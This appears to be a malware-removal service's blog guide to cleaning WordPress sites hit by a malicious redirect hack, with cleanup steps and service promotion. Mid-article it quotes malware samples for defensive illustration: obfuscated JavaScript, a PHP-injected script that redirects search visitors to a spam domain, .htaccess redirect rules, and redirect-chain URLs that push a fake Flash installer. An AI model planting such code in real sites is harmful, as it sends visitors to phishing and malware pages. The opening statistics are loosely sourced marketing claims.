Table of Contents [TOC]
WordPress website security and protection from malware or malicious code has become more important than ever in 2024. Its a well known fact that wordpress is used by more than 40% of websites. Estimated 64 million websites are currently using WordPress. Over 400 million people visit WordPress websites every month. Due to which WordPress hacking is on a rise in 2024.
According to Sucuri, WordPress malware infections saw a considerable increase from 83% to 90% in 2020-21.
According to Wp Hacked Help Experts, In 2024, more than 60% wordpress sites were infected with site redirecting to another malware. It is logical to conclude that WordPress users are more prone to encountering malware of this type in 2024 as well.
Is your WordPress site redirecting to another website? You are a victim of a redirect hack. In this article, we will provide you detailed info about WordPress malware redirect OR url redirect hack fix. We will show you how to fix hacked wordpress site redirecting to another site ?
Let’s Get Started With An Updated Step-By-Step Guide to Cleanup Malicious Redirects in WordPress Site. (Video & Infographic Included)
It’s important to understand this hack so that you can do a cleanup of your website and also prevent it from reoccurring in future. In case you are short of time, we can fix your hacked wordpress & remove malware from wordpress site.
We often come across users with following queries, if you have same questions in your mind, then this post is your one stop solution.
Why my website is redirecting to spam website?
Why my WordPress website is being redirected to another site?
How to stop my website redirecting to another site?
Often, we come across people asking questions such as why is my website redirecting to another site or to multiple websites. A straight forward answer to website getting redirected is that your WordPress has been hacked and is infected with a malware which sends visitors to a spamy or phishing sites. Know more about WordPress Phishing in this post.
Intent behind inserting such malicious redirects can be black hat seo, or obtaining ad impressions. Attacker exploits vulnerabilities present in your wordpress site via a backdoor or malicious scripts which are hidden in source code. In some cases, it also throws a 404 page not found error for your wp-admin area.
This could be due to an infected wordpress plugin, malware injected .header.php and footer.php or .htaccess. We have seen many instances of such a hack where WordPress Site URL Redirects to Another Site and have fixed it successfully.
This can negatively impact your business in many ways.
Is Your Site Infected With URL Redirect Malware !!! Let’s Find Out FREE(Click Below)
?”WordPress Malware Redirect” or “WordPress Redirect Hack” is a kind of malware or an exploit where infected site redirects the visitors to malicious website, phishing page and malware websites. It is likely due to the code injected in your WordPress database, that gets your WordPress site redirects to another site.
You can easily make out that your wordpress is infected with a redirect malware. Look out for these signs and symptoms to diagnose your site for redirect malware.
In case you come across any of the above mentioned symptoms, get in touch with us right away. Our scanner will thoroughly analyze your website, find the location of the hack & start the removal process.
Generally, a malicious WordPress Hacked Redirect is detected through the site’s front end when a visitor is redirected to any other page instead of the page or any website he requested. In most of the cases hackers use a particular malicious code to redirect the website to a porn or scam website to harm your website. Commonly used tricks includes:
If any malicious script is added by hackers it’s often named to look like a legitimate file like that’s the part of WordPress core files on the website. Hackers can add malicious code to wp-content/plugins or wp-content/uploads folders, .htaccess, wp-includes, wp-content/themes, or wp-config.php file.
Also Read – How To Remove Malware From Your WordPress Site
We recently noticed that large number of wordpress sites have been redirecting to malware infected domains such as ibuyiiittraffic[.com] and i.cuttttraffic[.com]. In this kind of redirection malware site webmaster comes across a 404 error on his wp-admin. This is accomplished by infecting the website with backdoor hack or other means of malicious java-scripts being induced by SQL injection or CSS. This is an explicit example of malware redirection ‘chains’ where websites get automatically redirected multiple times before landing on the domain as desired by the attacker.
In other instances, it re-directs when you click anywhere on the page or click ALLOW.
There are many instances found over net while doing a google search where we can see this kind of hack in action. In such cases, we can see that the initially a website redirects to clicks.xxfdftrafficx[.com],then to wwwx.xdsfdstraffic[.com] then to red.goabcdforward[.com], yellowlabel*****.[com] or ticker.*******records[.com] before landing on one of the sites.
We did a google search to find of instances of such a redirection hack and got one site which was already infected in SERPS.
There are other instances where the redirected domain customizes itself according to the location of the user. For example, if a user is from another country, the malware page will translate itself to his native language. Same goes for other locations as well.
Other instances of presence of malicious codes, which resulted in random redirection of visitors to malicious sites on hacked WordPress sites decoded.
Malicious javascript malicious scripts can also be inserted into widgets by appending Obfuscated javascript to the files.
An attacker can add a few lines of javascript to some or all of the javascript files within the site’s files. A search of site files looking for the URL to which that the site is redirecting might not find any results because this javascript is often obfuscated. Here is an example:
var_0xaae55=["","\x7A\x7F\x74\x7E","\x62\x75\x66\x75\x62\x63\x75","\x63\x60\x7C\x79\x64","\x3E\x...
Vulnerabilities such as Stored Cross-site Scripting (XSS) in WordPress plugins make it possible for hackers to add malicious JavaScript code to your website. When hackers get to know that a plugin is vulnerable to XSS, they find all the sites that are using that plugin and try to hack it. Plugins such as contact form 7, WordPress Ninja Forms, WordPress Yellow Pencil Plugin, Elementor pro & many others have been a target of such redirection hacks.
In general, the malicious code of 10 to 12 lines is inserted in header.php of the WordPress website.
When this is decoded the main part of the malware looks somewhat like this:
There is a logic behind the code. It will simply redirect the visitors to default7.com if in case it’s the first visit then it can set 896diC9OFnqeAcKGN7fW cookie for 1 year approx. to track the returning visitors.
echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) { self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>
Depending on the browser and IP a user can be redirected to any random domain listed below
There are various other effects of this malware that are somehow caused by few obvious bugs in the malicious code.
For example, see this line #9 in the decoded version
if ($_GET['6FoNxbvo73BHOjhxokW3'] !== NULL) {
For some reason the malware checks for the 6FoNxbvo73BHOjhxokW3 parameter, generally can’t do anything if a GET requests contains it. It’s not a problem though. The problem is that the code doesn’t make sure such a parameter exists before checking its value. In PHP, this causes a notice like this:
Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()’d code on line 9
In many cases, we have seen that attackers were hiding malicious code or files in the .htaccess file. These codes sometimes look exactly like legitimate codes. This makes it more difficult to identify and delete them. Besides inserting code into .htaccess files, codes can also be disguised in other WordPress core files like wp-config .php, wp-vcd, etc. to name a few.
The following image shows the hidden codes the security experts found on one of the clients’ sites.
Attacker can do changes in your htaccess file as it is a favorite location for attackers to place malicious redirect [Also Read – WordPress .htaccess hacked]. This file exists on your server and provides directives to server. It sends requests to server which further sends requests to wordpress primary index.php file to be handled. Often, these types of redirect chains (as seen in above examples) will make redirections based on the type of browser or device, or by the site that referred the visitor to your site (most often, from one of the search engines) A htaccess redirect can look like this:
RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android||meego|iphone|bada|bb\d+\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobi
RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|ms
Below you can see an example of hacked htaccess file.
Once they land on your website by overcoming a vulnerability, they can add themselves as an administrator to the site. Now that they are dealing with the full power of the site, they are redirecting it to other illegal, obscene, or unverified domains.
Users were also faced with a situation when using Internet Explorer. On Internet Explorer, the malware took users to websites that forced bogus Java updates and Flash updates. This link led to the download of the adobe_flash_player-31254524.exe file. Several security services reported that it was malware.
The strange case is when you use Internet Explorer the redirect chain may somewhat look like this:
default7 .com -> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r= -> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk. -> intva31 .saturnlibrary .info/dl-pure/1202231/31254524/?bc=1202231&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hashstring=oZy9K7h7eaHC&usefilename=true&executableroutePath=1202445&stub=true |
This code leads to the websites that push fake java and flash player updates on your screen. see above attached screenshot for reference.
Follow these steps to detect and remove malicious redirect hack in WordPress.
There are different places where you can look for malware on your website. It’s not always an easy way to scan the code on every page of your website, piece by piece. Sometimes the culprit is locked away somewhere on your server.
Still, there are some places that the attackers primarily target. You will need the ftp / ftps login credentials to navigate to these locations and initiate the malware cleaning process.
If your website suddenly redirects to one or more anonymous websites, you should look at the following sections of the suspicious code:
NOTE: Always backup wordpress database before making any changes in the core files and the database of the website. Perhaps having a backup is the best thing. If you accidentally make a mistake while cleaning your site, your backup is considered safe.
Follow this simple 5-Step guide to cleanup malware from your hacked WordPress site which results in redirection to another spam site:
If you suspect that your website has been hacked with a malicious script, there are different ways to verify. However, before running them, you should generate a full backup of your website. Although your site can be hacked, there is still a possibility that the situation will get worse before it gets better.
There are various ways of checking your site and in any case you find that your website has been hacked with a malicious script, you need to generate a complete backup of your website. While removing malware from wordpress site you might make any mistake and then that backup acts as your savior. Once you have backed up your complete website, you’re ready to run a website scan using cutting-edge WordPress Vulnerability & Malware Scanners.
Additional Tip: You may also try Google Diagnostic Page tool to help you find out exactly which part of your website is infected and number of infected directories/files.
Additional Tip: Here are a many wordpress security scanners online that offer free malware scan. Here you can get a complete list of 60+ online wordpress vulnerabilty scanners & security tools.
Scan My Server: Scans for malware, SQL injections, XSS, and more with a detailed report. The detailed report is emailed to you and takes approximately 24 hours.
There are number of places where you can locate the malicious code on your website. We understand it’s definitely not an easy task to scan the code chunk by chunk in each page of your website. There are times when the culprit can be enclosed somewhere in your server. And for few places you’ll need ftp/ftps login details to get access to these places to start the malware cleaning process.
Some of the most sensitive areas prone to infection are index.php, index.html, theme files, etc.
You can also look for malicious code with keywords like ‘eval’ or ‘eval base64_decode’. Apart from this, while performing a WordPress site hacked redirect, an attacker might also inject JS codes in files with .js extension.
PRO TIP: You can also compare the website code from the backup by using various code comparison tools e.g. diff checker or pretty diff to compare your plugin files with the original ones. For this, you have to download the exact same plugins from the WP repository and once installed you can start the code comparison to find out the differences.
If the attacker has access to WP-ADMIN, he can modify the theme files via infected header.php. This can be avoided by adding the following code to wp-config.php file. It will disable the user’s ability to change PHP files via wp-admin.
define( ‘DISALLOW_FILE_EDIT’, true );
Then you need to update the theme, plugins and install all new major updates available. Make sure everything is as up to date as possible. This will reduce the vulnerabilities of your website.
Finally, change all passwords on your website. And I mean all! Not only the WordPress admin password, you also need to reset your FTP account passwords, regenerate WordPress salt keys, database (s), hosting and anything else related to your site.
At times there is no harm in running tests to analyze whether your website is infected with a malware/malicious code or not. For this, you can use any test to pretend you’re a user agent or Google bot using a googlebot simulator or you can also use FETCH AS GOOGLE from the website’s webmaster console. There are few commands that work through ssh client. By employing certain code you can look into that place where the hacking has been done and further WordPress malware removal can be done manually too. [? Also Read – How to Scan & Detect Malware in WordPress Themes ]
UPDATE – GSC has been updated and the fetch as google tool was replaced by URL inspection tool as seen below:
Firstly, You’ll need to remove the malicious scripts that causes website redirection to the abusive sites. Identify all the pages on your website with malicious code and remove them from search engine. These website pages can be removed from the Search Engine Results together by using the remove URLs feature and by going to Google Search Engine Console. Also, update the plugins, themes and ensure the new core theme is installed plus up-to-date. Change or reset the passwords, Regenerate WordPress Salt Keys using this tool.
Here are some WordPress security plugins that can detect infected files:
Google Webmaster tool is one of the best tool for webmaster which you can get for free, and if you have not yet submitted your Website in GWT, you are missing out many vital information regarding your website. Here I’m sharing step by step guide to put malware review request using Google Webmaster tool:
Here you will see list of URL, google is suspecting that is infected with malware. Once you have cleaned all hacked files and your website is malware free, simply click on request a review, and add notes in the form of actions you have taken to remove the malware.
It’s important to secure your wordpress site in 2024 by following the guidelines listed below if you want to prevent redirect hack on your site in future:
If you don’t have time or the expertise to scan and clean up WordPress Hacked Redirect then we can do it for you. This is a priority service that will restore your hacked WordPress site in a day or less. We take full WordPress database backup & scan your entire site to ensure all malware is deleted, and all infected and vulnerable files are replaced with fresh, secure copies.
Our WordPress Malware Removal service helps to remove all malware, WordPress backdoors, Google blacklist warning messages, and protection against common WordPress vulnerabilities.
Our Next Gen WordPress security services includes malware removal, hack recovery, WordPress hardening, WordPress updates, secure backups and much more.